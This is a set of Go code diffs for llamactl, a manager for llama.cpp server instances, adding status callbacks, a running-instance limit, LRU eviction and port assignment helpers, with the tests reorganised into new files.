@@ -227,16 +236,20 @@ func (im *instanceManager) loadInstance(name, path string) error {
return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name) return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
} }
statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(persistedInstance.Name, oldStatus, newStatus)
}
// Create new inst using NewInstance (handles validation, defaults, setup) // Create new inst using NewInstance (handles validation, defaults, setup)
inst := instance.NewInstance(name, &im.instancesConfig, persistedInstance.GetOptions()) inst := instance.NewInstance(name, &im.instancesConfig, persistedInstance.GetOptions(), statusCallback)
// Restore persisted fields that NewInstance doesn't set // Restore persisted fields that NewInstance doesn't set
inst.Created = persistedInstance.Created inst.Created = persistedInstance.Created
inst.Running = persistedInstance.Running inst.SetStatus(persistedInstance.Status)
// Check for port conflicts and add to maps // Check for port conflicts and add to maps
if inst.GetOptions() != nil && inst.GetOptions().Port > 0 { if inst.GetPort() > 0 {
port := inst.GetOptions().Port port := inst.GetPort()
if im.ports[port] { if im.ports[port] {
return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port) return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
} }
@@ -252,7 +265,7 @@ func (im *instanceManager) autoStartInstances() {
im.mu.RLock() im.mu.RLock()
var instancesToStart []*instance.Process var instancesToStart []*instance.Process
for _, inst := range im.instances { for _, inst := range im.instances {
if inst.Running && // Was running when persisted if inst.IsRunning() && // Was running when persisted
inst.GetOptions() != nil && inst.GetOptions() != nil &&
inst.GetOptions().AutoRestart != nil && inst.GetOptions().AutoRestart != nil &&
*inst.GetOptions().AutoRestart { *inst.GetOptions().AutoRestart {
@@ -264,9 +277,20 @@ func (im *instanceManager) autoStartInstances() {
for _, inst := range instancesToStart { for _, inst := range instancesToStart {
log.Printf("Auto-starting instance %s", inst.Name) log.Printf("Auto-starting instance %s", inst.Name)
// Reset running state before starting (since Start() expects stopped instance) // Reset running state before starting (since Start() expects stopped instance)
inst.Running = false inst.SetStatus(instance.Stopped)
if err := inst.Start(); err != nil { if err := inst.Start(); err != nil {
log.Printf("Failed to auto-start instance %s: %v", inst.Name, err) log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
} }
} }
} }
func (im *instanceManager) onStatusChange(name string, oldStatus, newStatus instance.InstanceStatus) {
im.mu.Lock()
defer im.mu.Unlock()
if newStatus == instance.Running {
im.runningInstances[name] = struct{}{}
} else {
delete(im.runningInstances, name)
}
}
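A rough sketch of the bookkeeping this callback provides (local stand-in types; the real manager guards `runningInstances` with `im.mu`): every status transition adds or removes the instance name from a running set, which the max-running check and LRU eviction then consult:

```go
package main

import (
	"fmt"
	"sync"
)

type Status int

const (
	Stopped Status = iota
	Running
)

// tracker mirrors the manager's runningInstances bookkeeping.
type tracker struct {
	mu      sync.Mutex
	running map[string]struct{}
}

func (t *tracker) onStatusChange(name string, oldStatus, newStatus Status) {
	t.mu.Lock()
	defer t.mu.Unlock()
	if newStatus == Running {
		t.running[name] = struct{}{}
	} else {
		delete(t.running, name)
	}
}

func (t *tracker) runningCount() int {
	t.mu.Lock()
	defer t.mu.Unlock()
	return len(t.running)
}

func main() {
	t := &tracker{running: make(map[string]struct{})}

	// Each instance gets a closure that injects its own name,
	// matching the statusCallback wiring in CreateInstance/loadInstance.
	cb := func(name string) func(oldStatus, newStatus Status) {
		return func(oldStatus, newStatus Status) { t.onStatusChange(name, oldStatus, newStatus) }
	}

	llama := cb("llama-7b")
	llama(Stopped, Running)
	fmt.Println(t.runningCount()) // 1
	llama(Running, Stopped)
	fmt.Println(t.runningCount()) // 0
}
```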


@@ -2,6 +2,7 @@ package manager_test
import ( import (
"fmt" "fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp" "llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config" "llamactl/pkg/config"
"llamactl/pkg/instance" "llamactl/pkg/instance"
@@ -11,7 +12,6 @@ import (
"strings" "strings"
"sync" "sync"
"testing" "testing"
"time"
) )
func TestNewInstanceManager(t *testing.T) { func TestNewInstanceManager(t *testing.T) {
@@ -26,13 +26,13 @@ func TestNewInstanceManager(t *testing.T) {
TimeoutCheckInterval: 5, TimeoutCheckInterval: 5,
} }
manager := manager.NewInstanceManager(cfg) mgr := manager.NewInstanceManager(cfg)
if manager == nil { if mgr == nil {
t.Fatal("NewInstanceManager returned nil") t.Fatal("NewInstanceManager returned nil")
} }
// Test initial state // Test initial state
instances, err := manager.ListInstances() instances, err := mgr.ListInstances()
if err != nil { if err != nil {
t.Fatalf("ListInstances failed: %v", err) t.Fatalf("ListInstances failed: %v", err)
} }
@@ -41,217 +41,6 @@ func TestNewInstanceManager(t *testing.T) {
} }
} }
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
}
if inst.Running {
t.Error("New instance should not be running")
}
if inst.GetOptions().Port != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetOptions().Port)
}
}
func TestCreateInstance_ValidationAndLimits(t *testing.T) {
// Test duplicate names
mngr := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mngr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = mngr.CreateInstance("test-instance", options)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
// Test max instances limit
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
}
limitedManager := manager.NewInstanceManager(cfg)
_, err = limitedManager.CreateInstance("instance1", options)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// This should fail due to max instances limit
_, err = limitedManager.CreateInstance("instance2", options)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestPortManagement(t *testing.T) {
manager := createTestManager()
// Test auto port assignment
options1 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
port1 := inst1.GetOptions().Port
if port1 < 8000 || port1 > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port1)
}
// Test port conflict detection
options2 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: port1, // Same port - should conflict
},
}
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test port release on deletion
specificPort := 8080
options3 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: specificPort,
},
}
_, err = manager.CreateInstance("port-test", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
err = manager.DeleteInstance("port-test")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-port-test", options3)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestInstanceOperations(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instance
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Get instance
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
}
// List instances
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Errorf("Expected 1 instance, got %d", len(instances))
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
// Test operations on non-existent instances
_, err = manager.GetInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
err = manager.DeleteInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
_, err = manager.UpdateInstance("nonexistent", options)
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestPersistence(t *testing.T) { func TestPersistence(t *testing.T) {
tempDir := t.TempDir() tempDir := t.TempDir()
@@ -265,7 +54,8 @@ func TestPersistence(t *testing.T) {
// Test instance persistence on creation // Test instance persistence on creation
manager1 := manager.NewInstanceManager(cfg) manager1 := manager.NewInstanceManager(cfg)
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
Port: 8080, Port: 8080,
}, },
@@ -312,119 +102,27 @@ func TestPersistence(t *testing.T) {
} }
} }
func TestTimeoutFunctionality(t *testing.T) {
// Test timeout checker initialization
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
TimeoutCheckInterval: 10,
MaxInstances: 5,
}
manager := manager.NewInstanceManager(cfg)
if manager == nil {
t.Fatal("Manager should be initialized with timeout checker")
}
manager.Shutdown() // Clean up
// Test timeout configuration and logic without starting the actual process
testManager := createTestManager()
defer testManager.Shutdown()
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst, err := testManager.CreateInstance("timeout-test", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Test timeout configuration is properly set
if inst.GetOptions().IdleTimeout == nil {
t.Fatal("Instance should have idle timeout configured")
}
if *inst.GetOptions().IdleTimeout != 1 {
t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
}
// Test timeout logic without actually starting the process
// Create a mock time provider to simulate timeout
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set instance to running state so timeout logic can work
inst.Running = true
// Simulate instance being "running" for timeout check (without actual process)
// We'll test the ShouldTimeout logic directly
inst.UpdateLastRequestTime()
// Initially should not timeout (just updated)
if inst.ShouldTimeout() {
t.Error("Instance should not timeout immediately after request")
}
// Advance time to trigger timeout
mockTime.SetTime(time.Now().Add(2 * time.Minute))
// Now it should timeout
if !inst.ShouldTimeout() {
t.Error("Instance should timeout after idle period")
}
// Reset running state to avoid shutdown issues
inst.Running = false
// Test that instance without timeout doesn't timeout
noTimeoutOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
// No IdleTimeout set
}
noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", noTimeoutOptions)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
noTimeoutInst.SetTimeProvider(mockTime)
noTimeoutInst.Running = true // Set to running for timeout check
noTimeoutInst.UpdateLastRequestTime()
// Even with time advanced, should not timeout
if noTimeoutInst.ShouldTimeout() {
t.Error("Instance without timeout configuration should never timeout")
}
// Reset running state to avoid shutdown issues
noTimeoutInst.Running = false
}
func TestConcurrentAccess(t *testing.T) { func TestConcurrentAccess(t *testing.T) {
manager := createTestManager() mgr := createTestManager()
defer manager.Shutdown() defer mgr.Shutdown()
// Test concurrent operations // Test concurrent operations
var wg sync.WaitGroup var wg sync.WaitGroup
errChan := make(chan error, 10) errChan := make(chan error, 10)
// Concurrent instance creation // Concurrent instance creation
for i := 0; i < 5; i++ { for i := range 5 {
wg.Add(1) wg.Add(1)
go func(index int) { go func(index int) {
defer wg.Done() defer wg.Done()
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
instanceName := fmt.Sprintf("concurrent-test-%d", index) instanceName := fmt.Sprintf("concurrent-test-%d", index)
if _, err := manager.CreateInstance(instanceName, options); err != nil { if _, err := mgr.CreateInstance(instanceName, options); err != nil {
errChan <- err errChan <- err
} }
}(i) }(i)
@@ -435,7 +133,7 @@ func TestConcurrentAccess(t *testing.T) {
wg.Add(1) wg.Add(1)
go func() { go func() {
defer wg.Done() defer wg.Done()
if _, err := manager.ListInstances(); err != nil { if _, err := mgr.ListInstances(); err != nil {
errChan <- err errChan <- err
} }
}() }()
@@ -451,24 +149,25 @@ func TestConcurrentAccess(t *testing.T) {
} }
func TestShutdown(t *testing.T) { func TestShutdown(t *testing.T) {
manager := createTestManager() mgr := createTestManager()
// Create test instance // Create test instance
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
_, err := manager.CreateInstance("test-instance", options) _, err := mgr.CreateInstance("test-instance", options)
if err != nil { if err != nil {
t.Fatalf("CreateInstance failed: %v", err) t.Fatalf("CreateInstance failed: %v", err)
} }
// Shutdown should not panic // Shutdown should not panic
manager.Shutdown() mgr.Shutdown()
// Multiple shutdowns should not panic // Multiple shutdowns should not panic
manager.Shutdown() mgr.Shutdown()
} }
// Helper function to create a test manager with standard config // Helper function to create a test manager with standard config
@@ -485,25 +184,3 @@ func createTestManager() manager.InstanceManager {
} }
return manager.NewInstanceManager(cfg) return manager.NewInstanceManager(cfg)
} }
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
}


@@ -2,12 +2,15 @@ package manager
import ( import (
"fmt" "fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance" "llamactl/pkg/instance"
"llamactl/pkg/validation" "llamactl/pkg/validation"
"os" "os"
"path/filepath" "path/filepath"
) )
type MaxRunningInstancesError error
// ListInstances returns a list of all instances managed by the instance manager. // ListInstances returns a list of all instances managed by the instance manager.
func (im *instanceManager) ListInstances() ([]*instance.Process, error) { func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
im.mu.RLock() im.mu.RLock()
@@ -50,24 +53,17 @@ func (im *instanceManager) CreateInstance(name string, options *instance.CreateI
return nil, fmt.Errorf("instance with name %s already exists", name) return nil, fmt.Errorf("instance with name %s already exists", name)
} }
// Assign a port if not specified // Assign and validate port for backend-specific options
if options.Port == 0 { if err := im.assignAndValidatePort(options); err != nil {
port, err := im.getNextAvailablePort() return nil, err
if err != nil {
return nil, fmt.Errorf("failed to get next available port: %w", err)
}
options.Port = port
} else {
// Validate the specified port
if _, exists := im.ports[options.Port]; exists {
return nil, fmt.Errorf("port %d is already in use", options.Port)
}
im.ports[options.Port] = true
} }
inst := instance.NewInstance(name, &im.instancesConfig, options) statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(name, oldStatus, newStatus)
}
inst := instance.NewInstance(name, &im.instancesConfig, options, statusCallback)
im.instances[inst.Name] = inst im.instances[inst.Name] = inst
im.ports[options.Port] = true
if err := im.persistInstance(inst); err != nil { if err := im.persistInstance(inst); err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err) return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
@@ -109,7 +105,7 @@ func (im *instanceManager) UpdateInstance(name string, options *instance.CreateI
}
// Check if instance is running before updating options
wasRunning := instance.IsRunning()
// If the instance is running, stop it first
if wasRunning {
@@ -147,11 +143,11 @@ func (im *instanceManager) DeleteInstance(name string) error {
return fmt.Errorf("instance with name %s not found", name)
}
if instance.IsRunning() {
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
}
delete(im.ports, instance.GetPort())
delete(im.instances, name)
// Delete the instance's config file if persistence is enabled
@@ -168,15 +164,20 @@ func (im *instanceManager) DeleteInstance(name string) error {
func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
maxRunningExceeded := len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances && im.instancesConfig.MaxRunningInstances != -1
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already running", name)
}
if maxRunningExceeded {
return nil, MaxRunningInstancesError(fmt.Errorf("maximum number of running instances (%d) reached", im.instancesConfig.MaxRunningInstances))
}
if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
}
@@ -191,6 +192,17 @@ func (im *instanceManager) StartInstance(name string) (*instance.Process, error)
return instance, nil
}
func (im *instanceManager) IsMaxRunningInstancesReached() bool {
im.mu.RLock()
defer im.mu.RUnlock()
if im.instancesConfig.MaxRunningInstances != -1 && len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances {
return true
}
return false
}
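Note: MaxRunningInstances uses -1 as the "no limit" sentinel; the pre-start check in StartInstance and IsMaxRunningInstancesReached above encode the same rule. A minimal standalone restatement of that guard (illustrative sketch only, not part of this diff):

	// maxRunningReached reports whether starting one more instance would exceed the cap.
	// A cap of -1 disables the limit, matching the checks above.
	func maxRunningReached(running, limit int) bool {
		if limit == -1 {
			return false
		}
		return running >= limit
	}

For example, maxRunningReached(3, -1) is false, while maxRunningReached(3, 3) is true.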
// StopInstance stops a running instance and returns it.
func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
im.mu.RLock()
@@ -200,7 +212,7 @@ func (im *instanceManager) StopInstance(name string) (*instance.Process, error)
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if !instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already stopped", name)
}
@@ -240,3 +252,49 @@ func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
// TODO: Implement actual log retrieval logic
return fmt.Sprintf("Logs for instance %s", name), nil
}
// getPortFromOptions extracts the port from backend-specific options
func (im *instanceManager) getPortFromOptions(options *instance.CreateInstanceOptions) int {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
return options.LlamaServerOptions.Port
}
}
return 0
}
// setPortInOptions sets the port in backend-specific options
func (im *instanceManager) setPortInOptions(options *instance.CreateInstanceOptions, port int) {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
options.LlamaServerOptions.Port = port
}
}
}
// assignAndValidatePort assigns a port if not specified and validates it's not in use
func (im *instanceManager) assignAndValidatePort(options *instance.CreateInstanceOptions) error {
currentPort := im.getPortFromOptions(options)
if currentPort == 0 {
// Assign a port if not specified
port, err := im.getNextAvailablePort()
if err != nil {
return fmt.Errorf("failed to get next available port: %w", err)
}
im.setPortInOptions(options, port)
// Mark the port as used
im.ports[port] = true
} else {
// Validate the specified port
if _, exists := im.ports[currentPort]; exists {
return fmt.Errorf("port %d is already in use", currentPort)
}
// Mark the port as used
im.ports[currentPort] = true
}
return nil
}
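Note: together, getPortFromOptions, setPortInOptions and assignAndValidatePort let a caller either pin a port or leave it at zero and have the manager pick the next free one from the configured range. A hedged usage sketch (model paths and instance names are placeholders; import paths and config fields follow the test files in this diff):

	package main

	import (
		"fmt"

		"llamactl/pkg/backends"
		"llamactl/pkg/backends/llamacpp"
		"llamactl/pkg/config"
		"llamactl/pkg/instance"
		"llamactl/pkg/manager"
	)

	func main() {
		cfg := config.InstancesConfig{PortRange: [2]int{8000, 9000}, MaxInstances: 5, TimeoutCheckInterval: 5}
		mgr := manager.NewInstanceManager(cfg)
		defer mgr.Shutdown()

		// Port omitted: assignAndValidatePort picks the next free port in 8000-9000.
		auto := &instance.CreateInstanceOptions{
			BackendType:        backends.BackendTypeLlamaCpp,
			LlamaServerOptions: &llamacpp.LlamaServerOptions{Model: "/models/a.gguf"},
		}
		inst, err := mgr.CreateInstance("auto-port", auto)
		if err != nil {
			panic(err)
		}
		fmt.Println(inst.GetPort())

		// An explicit port that is already taken is rejected with "port ... is already in use".
		pinned := &instance.CreateInstanceOptions{
			BackendType:        backends.BackendTypeLlamaCpp,
			LlamaServerOptions: &llamacpp.LlamaServerOptions{Model: "/models/b.gguf", Port: inst.GetPort()},
		}
		if _, err := mgr.CreateInstance("pinned-port", pinned); err != nil {
			fmt.Println(err)
		}
	}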

View File

@@ -0,0 +1,229 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"strings"
"testing"
)
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
}
if inst.GetStatus() != instance.Stopped {
t.Error("New instance should not be running")
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
}
func TestCreateInstance_ValidationAndLimits(t *testing.T) {
// Test duplicate names
mngr := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mngr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = mngr.CreateInstance("test-instance", options)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
// Test max instances limit
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
}
limitedManager := manager.NewInstanceManager(cfg)
_, err = limitedManager.CreateInstance("instance1", options)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// This should fail due to max instances limit
_, err = limitedManager.CreateInstance("instance2", options)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestPortManagement(t *testing.T) {
manager := createTestManager()
// Test auto port assignment
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
port1 := inst1.GetPort()
if port1 < 8000 || port1 > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port1)
}
// Test port conflict detection
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: port1, // Same port - should conflict
},
}
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test port release on deletion
specificPort := 8080
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: specificPort,
},
}
_, err = manager.CreateInstance("port-test", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
err = manager.DeleteInstance("port-test")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-port-test", options3)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestInstanceOperations(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instance
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Get instance
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().LlamaServerOptions.Model)
}
// List instances
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Errorf("Expected 1 instance, got %d", len(instances))
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
// Test operations on non-existent instances
_, err = manager.GetInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
err = manager.DeleteInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
_, err = manager.UpdateInstance("nonexistent", options)
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}

View File

@@ -1,6 +1,10 @@
package manager
import (
"fmt"
"llamactl/pkg/instance"
"log"
)
func (im *instanceManager) checkAllTimeouts() {
im.mu.RLock()
@@ -24,3 +28,37 @@ func (im *instanceManager) checkAllTimeouts() {
}
}
}
// EvictLRUInstance finds and stops the least recently used running instance.
func (im *instanceManager) EvictLRUInstance() error {
im.mu.RLock()
var lruInstance *instance.Process
for name, _ := range im.runningInstances {
inst := im.instances[name]
if inst == nil {
continue
}
if inst.GetOptions() != nil && inst.GetOptions().IdleTimeout != nil && *inst.GetOptions().IdleTimeout <= 0 {
continue // Skip instances without idle timeout
}
if lruInstance == nil {
lruInstance = inst
}
if inst.LastRequestTime() < lruInstance.LastRequestTime() {
lruInstance = inst
}
}
im.mu.RUnlock()
if lruInstance == nil {
return fmt.Errorf("failed to find lru instance")
}
// Evict Instance
_, err := im.StopInstance(lruInstance.Name)
return err
}
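Note: the selection rule above is simply "smallest LastRequestTime wins" among running instances whose idle timeout is enabled. The same comparison in isolation, with plain int64 timestamps standing in for whatever LastRequestTime actually returns (an assumption made only for this sketch):

	// pickLRU returns the name with the oldest last-request timestamp, or "" if nothing is eligible.
	func pickLRU(lastRequest map[string]int64, eligible map[string]bool) string {
		var lruName string
		var lruTime int64
		for name, ts := range lastRequest {
			if !eligible[name] {
				continue // mirrors skipping instances with a disabled idle timeout
			}
			if lruName == "" || ts < lruTime {
				lruName, lruTime = name, ts
			}
		}
		return lruName
	}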

pkg/manager/timeout_test.go Normal file
View File

@@ -0,0 +1,328 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"sync"
"testing"
"time"
)
func TestTimeoutFunctionality(t *testing.T) {
// Test timeout checker initialization
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
TimeoutCheckInterval: 10,
MaxInstances: 5,
}
manager := manager.NewInstanceManager(cfg)
if manager == nil {
t.Fatal("Manager should be initialized with timeout checker")
}
